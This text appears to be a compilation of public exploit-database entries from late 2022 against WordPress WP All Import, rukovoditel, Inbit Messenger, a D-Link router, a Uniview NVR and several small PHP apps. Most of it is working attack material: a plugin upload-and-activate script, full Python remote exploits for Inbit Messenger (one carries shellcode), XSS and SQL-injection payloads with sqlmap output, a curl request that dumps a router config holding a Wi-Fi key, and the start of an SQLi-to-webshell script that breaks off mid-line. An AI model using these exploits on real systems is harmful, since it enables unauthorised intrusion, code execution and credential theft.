Expression patterns pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>' pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>' pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};' http_response: requests.Response is_secure_mode_enabled: bool wpnonce_edit_settings: str wpnonce_upload_file: str def __init__(self, http_response: requests.Response): self.http_response = http_response self.check_if_secure_mode_is_enabled() self.retrieve_wpnonce_edit_settings() self.retrieve_wpnonce_upload_file() def check_if_secure_mode_is_enabled(self): # To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked # <input type="checkbox" value="1" id="secure" name="secure" checked="checked"> regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve plugin settings. Are you an administrator?") # print_response(self.http_response) # for debugging exit() self.is_secure_mode_enabled = "checked" in regex_search.group() def retrieve_wpnonce_edit_settings(self): # You can find this wpnonce in the source file by searching for the following input hidden: # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9"> # 052e2438f9 would be the wpnonce for editing the settings regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?") # print_response(self.http_response) # for debugging exit() self.wpnonce_edit_settings = regex_search.group(1) def retrieve_wpnonce_upload_file(self): # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b'; # dee75fdb8b would be the wpnonce for the upload regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable") # print_response(self.http_response) # for debugging exit() self.wpnonce_upload_file = regex_search.group(1) def wp_login(): global session data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 } login_cookie = { "wordpress_test_cookie" : "WP Cookie check" } # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found. # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not print("Trying to login...") response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate) if response.status_code == 302: print("Logged in successfully!") return # print_response(response) # for debugging print("Login failed. If the credentials are correct, try to print the response to investigate further.") exit() def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response: global session if set_to_enabled: print("Enabling secure mode...") else: print("Disabling secure mode...") print("Edit settings wpnonce value: " + wpnonce) data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 } response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate) if response.status_code == 403: print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?") # print_response(response) # for debugging exit() return response def switch_back_to_secure_mode(): global session print("Re-enabling secure mode...") response = session.get(url=wp_all_import_page_settings) plugin_setting = PluginSetting(response) if plugin_setting.is_secure_mode_enabled: print("Secure mode is already enabled") return response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings) new_plugin_setting = PluginSetting(response) if not new_plugin_setting.is_secure_mode_enabled: print("Something went wrong: secure mode has not been re-enabled") # print_response(response) # for debugging exit() print("Secure mode has been re-enabled!") def get_wpnonce_upload_file() -> str: global session, re_enable_secure_mode # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload # If Secure Mode is already disabled, it just returns the wpnonce for the upload print("Checking if secure mode is enabled...") response = session.get(url=wp_all_import_page_settings) plugin_setting = PluginSetting(response) if not plugin_setting.is_secure_mode_enabled: re_enable_secure_mode = False print("Insecure mode is already enabled!") return plugin_setting.wpnonce_upload_file print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.") response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings) new_plugin_setting = PluginSetting(response) if new_plugin_setting.is_secure_mode_enabled: print("Something went wrong: secure mode has not been disabled") # print_response(response) # for debugging exit() print("Secure mode has been disabled!") re_enable_secure_mode = True return new_plugin_setting.wpnonce_upload_file def upload_file(wpnonce_upload_file: str): global session print("Uploading file...") print("Upload wpnonce value: " + wpnonce_upload_file) zip_file_name = os.path.basename(zip_file_to_upload) upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))} data = { "name" : zip_file_name } response = session.post(url=upload_url, files=files, data=data) if response.status_code == 200: print("Server replied with HTTP 200 OK. The upload should be completed.") print("Payload should be here: " + payload_url) print("If you can't find the payload at this URL, try to print the response to investigate further") # print_response(response) # for debugging return 1 else: print("Something went wrong during the upload. Try to print the response to investigate further") # print_response(response) # for debugging return 0 def activate_payload(): global session print("Activating payload...") response = session.get(url=payload_url) if response.status_code != 200: print("Something went wrong: could not find payload at " + payload_url) # print_response(response) # for debugging return def print_response(response:requests.Response): print(response.status_code) print(response.text) # Entry Point def Main(): print("Target: " + target_url) print("Credentials: " + admin_user + ":" + admin_pass) # Do the login wp_login() # Retrieve wpnonce for upload. # It disables Secure Mode if needed, then returns the wpnonce wpnonce_upload_file = get_wpnonce_upload_file() # Upload the file file_uploaded = upload_file(wpnonce_upload_file) # Re-enable Secure Mode if needed if re_enable_secure_mode: switch_back_to_secure_mode() # Activate the payload if file_uploaded: activate_payload() Main()

## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 11.03.2022 ## Vendor: https://www.rukovoditel.net/ ## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 ## Description: The application is vulnerable to DOM-based cross-site scripting attacks. Data is read from `location.hash` and passed to `jQuery.parseHTML`. The attacker can use this vulnerability to create an unlimited number of accounts on this system until it crashed. ## STATUS: HIGH Vulnerability - CRITICAL [+] Payload: ```POST GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1) ## Proof and Exploit: [href](https://streamable.com/i1qmfk) ## Time spent `3:45` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) # Date: 2022-11-08 # Exploit Author: Rajeshwar Singh # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip # Tested on: Windows/XAMPP ########################################################################### Payload use = "><script>alert("XSS")</script> 1. Visit URL http://localhost/bsms_ci/ 2. login with admin Credentials 3. navigate to user Management 4. Click on "Add New System User" 5. Add payload in "Name" input field 6. Click save. 7. Visit http://localhost/bsms_ci/index.php/user 8. XSS payload execute.

# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated) # Date: 08-11-2022 # Exploit Author: Matthijs van der Vaart (eMVee) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 1) Capture the login POST request with Burp Suite or OWASP ZAP 2) Save the request as "login.req" 3) Run sqlmap as follows: "sqlmap -r login.req" Example login.req ========== POST /controller/login.php HTTP/1.1 Host: target Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: https://target Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close name=admin%40gmail.com&password=password+&submit=Sign+In ========= Output example SQL Injection unauthenticated login page ========== POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests: --- Parameter: password (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: name, type: Single quoted string (default) [1] place: POST, parameter: password, type: Single quoted string ==========

# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, argparse, logging """ /opt/metasploit-framework/bin/msfvenom \ -p windows/messagebox \ ICON=WARNING \ TEXT="get wrecked" \ TITLE="LOLZ" \ EXITFUNC=thread \ -f py \ -v SHELLCODE \ -e x86/shikata_ga_nai \ -b '\x3E' """ SHELLCODE = b"" SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4" SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14" SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1" SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd" SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07" SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29" SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde" SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e" SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc" SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43" SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0" SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee" SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20" SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50" SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19" SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77" SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f" SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd" SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f" SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86" SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93" SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40" SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44" SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e" SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf" SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3" BANNER = """\033[0m\033[1;35m ╔═════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║ ╚═════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" BAD_BYTES = b"\x3e" # > PAYLOAD_LENGTH = 2000 nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET # NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10" NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48" NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01" NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B" NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00" NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89" NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00" def exploit(targetIp:str, targetPort:int) -> None: pkt = b"<" pkt += (b"A" * 40) pkt += nSEH pkt += SEH pkt += NULL_ACT_CTX_STUB pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder pkt += SHELLCODE # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt))) # NOTE: check for bad bytes for c in pkt: if c in BAD_BYTES: logging.error(f"found bad byte 0x{c:02x} in payload") sys.exit(-1) logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port)

# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, string, argparse, logging BANNER = """\033[0m\033[1;35m ╔══════════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║ ╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" # NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number TARGETS = { 4601 : 0x005f3360, 4801 : 0x005f7364, 4901 : 0x005f7364, } # NOTE: min and max values for length of command CMD_MIN_LEN = 10 CMD_MAX_LEN = 0xfc64 # NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow BAD_BYTES = b"\x3e" # > def getWinExecAddress(targetIp:str, targetPort:int) -> bytes: # NOTE: send packet with client build number of 4601 for v4.6.0 pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00" logging.info(f"trying to get version information from {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) _d = s.recv(1024) # find build tag in response if b'<c>' not in _d: logging.error(f"invalid version packet received: {_d}") sys.exit(-1) s.close() try: build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')]) except: logging.error(f"failed to parse build number from packet: {_d}") sys.exit(-1) # get the IAT offset if build not in TARGETS.keys(): logging.error(f"unexpected build number: {build}") sys.exit(-1) # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]' winexec = struct.pack("<I", TARGETS[build] - 0x38) logging.success(f"target build number is {build}") logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}") # sanity check for bad bytes in WinExec address for c in winexec: if c in BAD_BYTES: logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}") sys.exit(-1) return winexec def exploit(targetIp:str, targetPort:int, command:bytes) -> None: # NOTE: command must be NULL terminated command += b"\x00" # check user command length if len(command) < CMD_MIN_LEN: logging.error(f"command length must be at least {CMD_MIN_LEN} characters") sys.exit(-1) if len(command) >= CMD_MAX_LEN: logging.error(f"command length must be less than {CMD_MAX_LEN} characters") sys.exit(-1) # get WinExec address winexec = getWinExecAddress(targetIp, targetPort) # get a string representation of the length of the command data after the <> tag parsed by atol() pktLen = str(len(command)) pkt = b"<" # start of XML tag/stack overflow pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character pkt += b"\x00" # NULL terminator to force atol to ignore what comes next # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol() pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite pkt += winexec # indirect function pointer we control pkt += b">" # end of XML tag/stack overflow pkt += command # the command set to the call to WinExec() logging.info(f"sending payload to {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-c', '--command', help='command to run', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port, args.command.encode())

# Exploit Title: Outline V1.6.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Discovery Date: 2022-11-10 # Vendor Homepage: https://getoutline.org/ # Software Link: https://getoutline.org/ # Tested Version: V1.6.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 11 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe Auto C:\>sc qc OutlineService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OutlineService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OutlineService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 11 Enterprise OS Version: 10.0.22000 N/A Build 22000 OS Manufacturer: Microsoft Corporation

# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure # Date: 2022-11-10 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 # Firmware Version: ME_1.00 # Tested on: Windows 11 # [ Details - DSL-124 ]: #The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office, #With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection, #Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports, #the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet. # [ Description ]: #After the administrator enters and a new session is created, the attacker sends a request using the post method in her system, #and in response to sending this request, she receives a complete backup of the router settings, #In fact this happens because of the lack of management of users and sessions in the network. # [ POC ]: Request : curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi Response : HTTP/1.1 200 OK Connection: close Server: Virtual Web 0.9 Content-Type: application/octet-stream; Content-Disposition: attachment;filename="config.img" Pragma: no-cache Cache-Control: no-cache <Config_Information_File_8671> <V N="WLAN_WPA_PSK" V="pass@12345"/> <V N="WLAN_WPA_PSK_FORMAT" V="0x0"/> <V N="WLAN_WPA_REKEY_TIME" V=""/> <V N="WLAN_ENABLE_1X" V="0x0"/> <V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/> <V N="WLAN_RS_IP" V="0.0.0.0"/> . . . </Config_Information_File_8671>

# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) # Author: Bleron Rrustemi # Discovery Date: 2022-11-15 # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ # Datasheet:: https://www.uniview.com/download.do?id=1761643 # Device Firmware: NVR-B3801.20.15.200829 # Tested Version: NVR301-04S2-P4 # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit) # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: IP=IP of the device http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script> Best regards, Bleron Rrustemi Chief Technology Officer Direct: +383 (0) 49 955 503 E-mail: <mailto:[email protected]> [email protected] <http://> Drugëza SHPK Rr. Lekë Dukagjini p.n Prishtinë, 10000 • Kosovo Tel.: +383 49 955 503 www.drugeza.com ü Be GREEN, keep it on the SCREEN

# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection # Exploit Author: Ameer Hamza # Date: November 15, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code # Tested on: Kali Linux, Apache, Mysql # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account. [+] The username parameter is vulnerable to SQLi in login page [+] URL --> http://localhost/hss/admin/login.php [+] Username = ' OR 1=1-- - HTTP REQUEST POST /hss/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 38 Origin: http://localhost Connection: close Referer: http://localhost/hss/admin/login.php Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa username='+OR+1%3D1+--+-&password=1234

# Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE) # Exploit Author: Joe Pollock # Date: November 16, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip # Tested on: Kali Linux, Apache, Mysql # Vendor: Kapiya # Version: 1.0 # Exploit Description: # Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to # write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. # This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command. # Ex: python3 rcsv1.py 10.10.14.2 "ls" import sys, requests def main(): if len(sys.argv) != 3: print("(+) usage: %s <target> <cmd>" % sys.argv[0]) print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0]) sys.exit(-1) targetIP = sys.argv[1] cmd = sys.argv[2] s = requests.Session() # Define obscure filename and command parameter to limit exposure and usage of the RCE. FILENAME = "youcantfindme.php" CMDVAR = "ohno" # Define the SQL injection string sqli = 